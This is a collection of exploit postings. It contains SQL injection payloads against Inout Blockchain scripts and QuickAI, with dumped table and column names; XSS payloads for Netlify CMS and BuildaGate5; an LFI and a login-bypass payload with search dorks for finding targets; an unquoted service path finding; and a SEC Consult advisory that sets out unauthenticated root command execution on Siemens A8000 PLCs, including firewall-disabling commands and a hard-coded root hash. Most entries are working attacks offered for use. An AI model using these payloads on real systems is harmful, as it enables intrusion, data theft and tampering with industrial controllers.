<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-blockchain-easypayments/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Blockchain EasyPayments 1.0.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php/payment/getcoinaddress<br /><br /><br />----------------------------------------------------------------------------<br />POST /index.php/payment/getcoinaddress HTTP/2<br /><br />coinid=[SQLI]&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000<br />----------------------------------------------------------------------------<br /><br />POST parameter 'coinid' is vulnerable to SQL Injection<br /><br />---<br />Parameter: coinid (POST)<br /> Type: boolean-based blind<br /> Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace<br /> Payload: coinid=(SELECT (CASE WHEN (08758=8758) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: coinid=(SELECT(0)FROM(SELECT(SLEEP(5)))a)&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: '*****_blockchain_easypayments_**'<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Blockchain AltExchanger 2.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /application/third_party/Chart/TradingView/chart_content/master.php/history<br /><br />https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203<br /><br />GET parameter 'symbol' is vulnerable to SQL Injection<br /><br />---<br />Parameter: symbol (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: symbol=ZRX-BTC') AND 06585=6585<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: '*****_blockchain_altexchanger_***'<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://quickai.bylancer.com/ │<br />│ Vendor : bylancer │<br />│ Software : QuickAI OpenAI 3.8.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=123') OR 08039=8039 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickai_**'<br /><br /><br />fetching tables<br /><br />[47 tables]<br />+----------------------------+<br />| qa_faq_entries |<br />| qa_text_to_speech_used |<br />| qa_user_options |<br />| qa_ai_images |<br />| qa_logs |<br />| qa_orders |<br />| qa_adsense |<br />| qa_ai_speeches |<br />| qa_word_used |<br />| qa_ai_templates |<br />| qa_blog |<br />| qa_api_keys |<br />| qa_ai_chat_prompts |<br />| qa_blog_comment |<br />| qa_subscriber |<br />| qa_post_options |<br />| qa_admins |<br />| qa_transaction |<br />| qa_plans |<br />| qa_languages |<br />| qa_speech_to_text_used |<br />| qa_countries |<br />| qa_upgrades |<br />| qa_ai_template_categories |<br />| qa_affiliates |<br />| qa_image_used |<br />| qa_plan_options |<br />| qa_options |<br />| qa_blog_categories |<br />| qa_prepaid_plans |<br />| qa_ai_custom_templates |<br />| qa_payments |<br />| qa_user |<br />| qa_ai_documents |<br />| qa_withdrawal |<br />| qa_balance |<br />| qa_ai_chat_bots |<br />| qa_taxes |<br />| qa_time_zones |<br />| qa_currencies |<br />| qa_testimonials |<br />| qa_ai_chat |<br />| qa_blog_cat_relation |<br />| qa_pages |<br />| qa_ai_chat_conversations |<br />| qa_ai_chat_bots_categories |<br />| qa_post |<br />+----------------------------+<br /><br /><br />fetching columns for Table: qa_user<br /><br />[49 columns]<br />+----------------+<br />| id |<br />| group_id |<br />| username |<br />| user_type |<br />| balance |<br />| password_hash |<br />| forgot |<br />| confirm |<br />| email |<br />| status |<br />| view |<br />| created_at |<br />| updated_at |<br />| name |<br />| tagline |<br />| description |<br />| dob |<br />| salary_min |<br />| salary_max |<br />| category |<br />| subcategory |<br />| website |<br />| sex |<br />| phone |<br />| postcode |<br />| address |<br />| country |<br />| city |<br />| city_code |<br />| state_code |<br />| country_code |<br />| image |<br />| lastactive |<br />| facebook |<br />| twitter |<br />| googleplus |<br />| instagram |<br />| linkedin |<br />| youtube |<br />| oauth_provider |<br />| oauth_uid |<br />| oauth_link |<br />| online |<br />| notify |<br />| notify_cat |<br />| currency |<br />| referral_key |<br />| referred_by |<br />| menu_layout |<br />+----------------+<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230703-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities including Unauthenticated RCE<br /> product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)<br /> Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)<br /> vulnerable version: <= V04.92<br /> fixed version: CPCI85 V05<br /> CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920,<br /> CVE-2023-33921<br /> impact: Critical<br /> homepage: https://www.siemens.com<br /> found: 2023-02-15<br /> by: Stefan Viehböck (Office Vienna)<br /> Christian Hager (Office Vienna)<br /> Steffen Robertz (Office Vienna)<br /> Gerhard Hechenberger (Office Vienna)<br /> Gorazd Jank (Office Vienna)<br /> Constantin Schieber-Knoebl (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We are a technology company focused on industry, infrastructure,<br />transport, and healthcare. From more resource-efficient factories,<br />resilient supply chains, and smarter buildings and grids, to cleaner<br />and more comfortable transportation as well as advanced healthcare,<br />we create technology with purpose adding real value for customers."<br /><br />Source: https://new.siemens.com/global/en/company/about.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br />Customers should update to CPCI85 V05 or later version.<br />(https://support.industry.siemens.com/cs/ww/en/view/109804985/)<br /><br />SEC Consult highly recommends to perform a thorough security review of<br />the product conducted by security professionals to identify and resolve<br />potential further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Unauthenticated Remote Code Execution (CVE-2023-28489)<br />By sending an HTTP request with a crafted header to port 80/443 of<br />the PLC, arbitrary commands can be executed as system user. The port<br />is used to configure and control Siemens PLCs with the Siemens<br />Toolbox II application and is typically accessible on such devices.<br /><br />2) Authenticated Command Injection (CVE-2023-33919)<br />Due to missing server-side input sanitation, any user with access to<br />the SICAM WEB interface can execute arbitrary commands as user "root"<br />on the device. This works by setting malicious parameters and starting<br />an Ethernet package capture.<br /><br />3) Hard-coded Root Password (CVE-2023-33920)<br />The PLC contains a hard-coded "root" user password hash. This<br />password hash is the same on all devices. If the corresponding<br />password is known, it could be used to login via UART and SSH.<br /><br />4) Console Login via UART (CVE-2023-33921)<br />The UART interface can be accessed with physical access to the PCB.<br />After connecting to the interface, boot information is given and a<br />login prompt is provided. Login as "root" user is possible after<br />changing the hard-coded "root" password hash (see 1,2, and 3).<br /><br /><br />Proof of concept:<br />-----------------<br />1) Unauthenticated Remote Code Execution (CVE-2023-28489)<br />To exploit this vulnerability, an HTTP request including the command<br />must be crafted. No "/" characters can be used, therefore commands<br />are encoded as base64, e.g., "id" as "aWQ=". The command must be<br />provided as UPLOADFILENAME header. A full command looks as follows:<br /><br />;echo aWQ=| base64 -d | sh #<br /><br />The following header format must be obeyed:<br />* User-Agent: SICAM TOOLBOX II<br />* Session-ID: [ARBITRARY 16 CHARACTERS]<br />* UPLOADFILENAME: [COMMAND]<br /><br />Additionally, the request body must contain the following POST parameters:<br />* type=20<br />* length=[ARBITRARY]<br />* data=[ARBITRARY]<br /><br />A valid request can be seen below:<br />-----------------------------------------------------------------------<br />[ POC request removed ]<br />-----------------------------------------------------------------------<br /><br />If it worked, the response body will be "type=21". Additionally, the<br />output on the UART interface indicates code execution as root user:<br />-----------------------------------------------------------------------<br />base64: /ies/IN/_: No such file or directory<br />uid=0(root) gid=0(root)<br />-----------------------------------------------------------------------<br /><br />Subsequently, the SSH port can be opened by sending the following<br />commands separately and encoded as base64 string. They will replace<br />the set default root password hash with an empty password hash,<br />reconfigure the Dropbear SSH daemon and stop the firewall:<br />-----------------------------------------------------------------------<br />sed -i<br />s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg<br />re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow<br />sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear<br />/etc/init.d/dropbear restart<br />/etc/init.d/rc.firewall stop<br />-----------------------------------------------------------------------<br /><br />After this, login via SSH as root is possible:<br />-----------------------------------------------------------------------<br />ssh root@[IP]<br />root@[IP]'s password:<br />~# id<br />uid=0(root) gid=0(root) groups=0(root),10(wheel)<br />~#<br />-----------------------------------------------------------------------<br /><br /><br />2) Authenticated Command Injection (CVE-2023-33919)<br />To trigger the command injection vulnerability, the payload must be set in<br />the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation"<br />-> "Ethernet Packet Capture" section "Capture configuration"<br />(other fields may also be affected).<br />As the web interface only provides a drop-down menu, the payload must<br />be set by manipulating the JavaScript logic or by directly manipulating<br />the HTTP request as below, where "ping [IP]\nBBBBBBB" was set:<br /><br />-----------------------------------------------------------------------<br />POST /sicweb-ajax/rtum85/cview HTTP/1.1<br />Host: [HOST]<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/xml<br />SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT<br />Content-Length: 198<br />Origin: http://[HOST]<br />Connection: close<br />Referer: http://[HOST]/<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"><br /><value><br />ping [IP]<br />BBBBBBB</value><br /></parameter></view></Cmd_SetCustomViewValue><br />-----------------------------------------------------------------------<br /><br />The line break in the payload is especially important, as the command is<br />executed as part of a shell script.<br />This script is generated and executed by pressing the "Start/Stop trace"<br />button in the "Capture Controlling" section and saved as<br />/tmp/incws_tcpdump.sh. An excerpt with the injected command is shown<br />below:<br /><br />-----------------------------------------------------------------------<br />[...] # lets start tcpdump<br />tcpdump -i<br />ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap &<br />[...]<br />-----------------------------------------------------------------------<br /><br />The executed script creates a process running as root user, which can<br />be seen by running "ps" on the device:<br /><br />-----------------------------------------------------------------------<br />root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit<br />root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json<br />[...]<br />www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf<br />root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \_ /bin/sh /tmp/incws_tcpdump.sh<br />root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \_ ping [IP]<br />-----------------------------------------------------------------------<br /><br /><br />3) Hard-coded Root Password (CVE-2023-33920)<br />A hard-coded "root" user password hash can be found in the /etc/shadow<br />file:<br />-----------------------------------------------------------------------<br />root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg<br />re5P14Kv2zAH1:16436:0:99999:7:::<br />-----------------------------------------------------------------------<br /><br /><br />4) Console Login via UART (CVE-2023-33921)<br />The serial console (UART) can be accessed on the backside of the PCB<br />on two Vias. After removing an additional logic IC, receiving data and<br />sending data is possible with the following UART settings:<br />* Voltage: 3.3V<br />* Speed: 115200 Baud<br />* Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)<br />Extensive boot log output can be received. Some output is shown below:<br />-----------------------------------------------------------------------<br />U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02)<br />BOARD : Altera SOCFPGA Cyclone V Board<br />CLOCK: EOSC1 clock 50000 KHz<br />[...]<br />Starting IES system<br />-----------------------------------<br />Welcome to SICAM IES<br />-----------------------------------<br /><br />Welcome to<br /> _______. __ ______ ___ .___ ___.<br /> / || | / | / \ | \/ |<br /> | (----`| | | ,----' / ^ \ | \ / |<br /> \ \ | | | | / /_\ \ | |\/| |<br />.----) | | | | `----./ _____ \ | | | |<br />|_______/ |__| \______/__/ \__\ |__| |__| RTUs<br /><br />[...]<br />sicam login:<br />-----------------------------------------------------------------------<br /><br />Additionally, a console login form is displayed. Login is possible if<br />the password for the set "root" user password hash (see 3) is known.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following product has been tested:<br />* Siemens A8000 CP-8050 04.92<br />* Siemens A8000 CP-8031 04.92<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-03-14: Contacting vendor through productcert@siemens.com, sending<br /> encrypted advisory<br />2023-03-29: Naming researchers involved<br />2023-03-31: Requesting state. Vulnerability 1 will be published first<br /> due to criticality. Rest will follow.<br />2023-04-11: Siemens releases advisory for unauthenticated RCE<br /> (Vulnerability 1, CVE-2023-28489)<br />2023-06-13: Siemens releases advisory for vulnerability 2, 3 and 4<br /> (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921)<br />2023-06-21: Siemens has additional feedback regarding the contents of the<br /> advisory.<br />2023-07-03: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update to firmware CPCI85 V05 or later version, see vendor advisory<br />for further information:<br />https://cert-portal.siemens.com/productcert/html/ssa-472454.html<br />https://cert-portal.siemens.com/productcert/html/ssa-731916.html<br /><br /><br />Workaround:<br />-----------<br />Restrict network access to the A8000 CP-8050/CP8031 module or disable the<br />Toolbox II communication on port 80/443. Make sure to strictly limit<br />physical access to the PLC during and also after its life cycle.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger,<br />Gorazd Jank, Constantin Schieber-Knoebl / @2023<br /><br /></code></pre>
<pre><code># Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://decapcms.org/docs/intro/<br /># Software Link: https://github.com/decaporg/decap-cms<br /># Version: 2.10.192<br /># Tested on: https://cms-demo.netlify.com<br /><br /><br />Description:<br /><br />1. Go to new post and write body field your payload:<br /><br />https://cms-demo.netlify.com/#/collections/posts<br /><br />Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe><br /><br />2. After save it XSS payload will executed and see alert box<br /></code></pre>
<pre><code># Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: None<br /># Version: 5<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36163<br /><br />#PoC:<br />An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:<br />'><script>prompt("XSS");</script><div id="aa<br /><br />After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.<br /><br />#Payload:<br />company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Rukovoditel Project Management CRM 2.4.1 LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://www.rukovoditel.net/ | <br />| # Dork : "Powered by Rukovoditel" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] index.php in install folder line : 25 include('languages/' . $_GET['lng'] . '.php');<br /><br />[+] Use Payload : /install/index.php?lng=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&step=rukovoditel_config<br /><br />[+] https://target_site/hrprocess//install/index.php?lng=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&step=rukovoditel_config<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Blockchain FiatExchanger 3.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php/coins/update_marketboxslider<br /><br />----------------------------------------------<br />POST /index.php/coins/update_marketboxslider HTTP/2<br /><br />marketcurrency=[SQLI]&displaylimit=4<br />----------------------------------------------<br /><br />POST parameter 'marketcurrency' is vulnerable to SQL Injection<br /><br />---<br />Parameter: marketcurrency (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: '*****_blockchain_fiatexchanger_**'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.minitool.com/<br /># Software Link: https://www.minitool.com/download-center/<br /># Version: 12.7<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36164<br /><br /># PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto<br /><br />C:\Users>sc qc MTAgentService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MTAgentService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MTAgentService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path<br /><br /><br /><br /><br /><br /><br /><br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.minitool.com/<br /># Software Link: https://www.minitool.com/download-center/<br /># Version: 12.7<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36165<br /><br />#PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto<br /><br />C:\Users>sc qc MTSchedulerService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MTSchedulerService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MTSchedulerService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CANDOO Strategic CMS V2.0 Auth By pass vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : https://www.candootech.com/ |<br />| # Dork : news2.php?newsno= |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Use Payload User & PAss : 1'or'1'='1 <br /><br />[+] http://127.0.0.1/harvardvisioncom/admin/login.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>